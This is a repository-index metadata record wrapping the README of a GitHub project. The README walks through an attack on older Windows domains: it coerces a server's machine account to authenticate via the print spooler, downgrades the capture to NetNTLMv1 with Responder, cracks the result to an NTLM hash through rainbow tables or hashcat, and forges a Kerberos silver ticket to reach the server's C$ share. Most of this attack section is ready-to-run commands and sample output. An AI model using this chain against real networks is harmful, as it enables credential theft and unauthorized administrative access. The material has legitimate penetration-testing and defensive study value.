{"id":13842798,"url":"https://github.com/NotMedic/NetNTLMtoSilverTicket","last_synced_at":"2025-07-11T15:33:11.561Z","repository":{"id":41364408,"uuid":"165685550","full_name":"NotMedic/NetNTLMtoSilverTicket","owner":"NotMedic","description":"SpoolSample -\u003e Responder w/NetNTLM Downgrade -\u003e NetNTLMv1 -\u003e NTLM -\u003e Kerberos Silver Ticket","archived":false,"fork":false,"pushed_at":"2021-07-26T15:16:20.000Z","size":20,"stargazers_count":725,"open_issues_count":0,"forks_count":112,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-08-05T17:33:19.703Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NotMedic.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-01-14T15:32:27.000Z","updated_at":"2024-07-29T15:34:45.000Z","dependencies_parsed_at":"2022-08-25T08:11:33.556Z","dependency_job_id":null,"html_url":"https://github.com/NotMedic/NetNTLMtoSilverTicket","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NotMedic","download_url":"https://codeload
.github.com/NotMedic/NetNTLMtoSilverTicket/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225737132,"owners_count":17516293,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:46.529Z","updated_at":"2024-11-21T13:31:09.974Z","avatar_url":"https://github.com/NotMedic.png","language":"PowerShell","readme":"# SpoolSample -\u003e NetNTLMv1 -\u003e NTLM -\u003e Silver Ticket\r\n\r\nThis technique has been alluded to by others, but I haven't seen anything cohesive out there.  Below we'll walk through the steps of obtaining NetNTLMv1 Challenge/Response authentication, cracking those to NTLM Hashes, and using that NTLM Hash to sign a Kerberos Silver ticket.\r\n\r\nThis will work on networks where \"LAN Manager authentication level\" is set to 2 or less. This is a fairly common scenario in older, larger Windows deployments.  It should not work on Windows 10 / Server 2016 or newer.\r\n\r\n## There are 3 main steps\r\n\r\nObtain a NetNTLMv1 Response of a machine account via @tifkin_'s (Lee Christensen's) SpoolSample\r\n\r\nCrack that NetNTLMv1 Response back into an NTLM Hash using @0x31337's (David Hulton's) Rainbow Tables\r\n\r\nGenerate a Silver Ticket using the newly obtained NTLM Hash using @agsolino's (Albert Solino's) ticketer.py\r\n\r\n## Obtain a NetNTLMv1 Response\r\n\r\n### Identify potentially vulnerable machines\r\n\r\nUsing PowerShell, get a list of Windows boxes. Servers are usually priority, so let's focus there:\r\n\r\n    Get-ADComputer -Filter {(OperatingSystem -like \"*windows*server*\") -and (OperatingSystem -notlike \"2016\") -and (Enabled -eq \"True\")} -Properties * | select Name | ft -HideTableHeaders \u003e servers.txt\r\n\r\nUsing a slightly modified @mysmartlogin's (Vincent Le Toux's) SpoolerScanner, see if the Spooler Service is listening\r\n\r\n    . .\\Get-SpoolStatus.ps1\r\n    ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}\r\n\r\nYou can also use rpcdump.py on Linux and look for the MS-RPRN Protocol\r\n\r\n    rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN\r\n\r\n### Start Responder with the --lm flag to force an LM downgrade\r\n\r\n    ./Responder.py -I eth0 --lm\r\n\r\n### Trigger an authentication\r\n\r\n    SpoolSample.exe TARGET RESPONDERIP\r\n\r\nor use 3xocyte's dementor.py if you're on Linux\r\n\r\n    python dementor.py -d domain -u username -p password RESPONDERIP TARGET\r\n\r\nExample Response:\r\n\r\n```bash\r\n[SMB] NTLMv1 Client   : 10.0.0.2\r\n[SMB] NTLMv1 Username : DOMAIN\\SERVER$\r\n[SMB] NTLMv1 Hash     : SERVER$::DOMAIN:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972:1122334455667788\r\n```\r\n\r\n## Crack the NetNTLMv1 responses back into an NTLM Hash\r\n\r\nYou can use a set of Rainbow Tables to reverse the NTHASH to NTLM, or you can reverse it to its DES constituent components and crack it with hashcat.\r\n\r\nAn 8x 1080 rig can brute force it in about 6 days, so consider Rainbow Tables.\r\n\r\n### Rainbow Tables\r\n\r\n1. For Rainbow Tables, there is a service hosted at [https://crack.sh/netntlm/](https://crack.sh/netntlm/) that will recover NTLM from NetNTLMv1 for free. This is provided by David Hulton of Toorcon.  We're working on a local copy of the rainbow tables and software that does not require an FPGA for lookups.\r\n\r\n2. For crack.sh, the format is\r\n     NTHASH:(response), so NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 from the example.\r\n\r\n### Or Cracking Them with hashcat\r\n\r\n1. @evil_mog's [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool below can break them\r\n\r\n```bash\r\npython3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788\r\n```\r\n\r\nThis will return the below output with instructions:\r\n\r\n```bash\r\n['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']\r\n\r\nHostname: DUSTIN-5AA37877\r\nUsername: hashcat\r\nChallenge: 1122334455667788\r\nLM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D\r\nNT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595\r\nCT1: 727B4E35F947129E\r\nCT2: A52B9CDEDAE86934\r\nCT3: BB23EF89F50FC595\r\n\r\nTo Calculate final 4 characters of NTLM hash use:\r\n./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788\r\n\r\nTo crack with hashcat create a file with the following contents:\r\n727B4E35F947129E:1122334455667788\r\nA52B9CDEDAE86934:1122334455667788\r\n\r\nTo crack with hashcat:\r\n./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1\r\n\r\nTo Crack with crack.sh use the following token\r\nNTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595\r\n```\r\n\r\n## Create a Kerberos Silver Ticket\r\n\r\nYou'll need to find a few pieces of information for this: SPN of the service you want to access, domain SID, domain user account SID and account name with local admin access, and a domain group that user is a member of if it's group-based local admin.\r\n\r\nFor the service, the most common will be cifs/ as it maps back to the HOST/ service\r\n\r\n### Generate a Silver Ticket using Impacket's ticketer.py\r\n\r\n```bash\r\n./ticketer.py -nthash 09e55a127f3d4e4957c77de30000502a -domain-sid S-1-5-21-7375663-6890924511-1272660413 -domain DOMAIN.COM -spn cifs/SERVER.DOMAIN.COM -user-id 123456 -groups 4321 username\r\n```\r\n\r\n### Set the generated ccache file to the appropriate environment variable\r\n\r\n```bash\r\nexport KRB5CCNAME=/root/Assessments/NTLMTest/USERNAME.ccache\r\n```\r\n\r\n### Use smbclient, wmiexec, psexec, or any other Impacket tool\r\n\r\n```bash\r\nsmbclient -k //SERVER.DOMAIN.COM/c$ -d\r\n```\r\n\r\n## Work left to do\r\n\r\n* Distribute 6TB of Rainbow Tables\r\n  * Torrent w/@0x31337's Permission?\r\n  * DEF CON Data Duplication Village?\r\n\r\n* Modify @0x31337's [desrtop](https://github.com/h1kari/desrtop) to not require an FPGA\r\n  * Outside my personal wheelhouse, but I'm grinding anyway\r\n\r\n* Identify more ways to trigger a machine account authentication remotely\r\n  * xp_dirtree is another path\r\n  * Anyone willing to share others they may have found?\r\n","funding_links":[],"categories":["PowerShell","PowerShell (153)","Operating Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNotMedic%2FNetNTLMtoSilverTicket","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNotMedic%2FNetNTLMtoSilverTicket","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNotMedic%2FNetNTLMtoSilverTicket/lists"}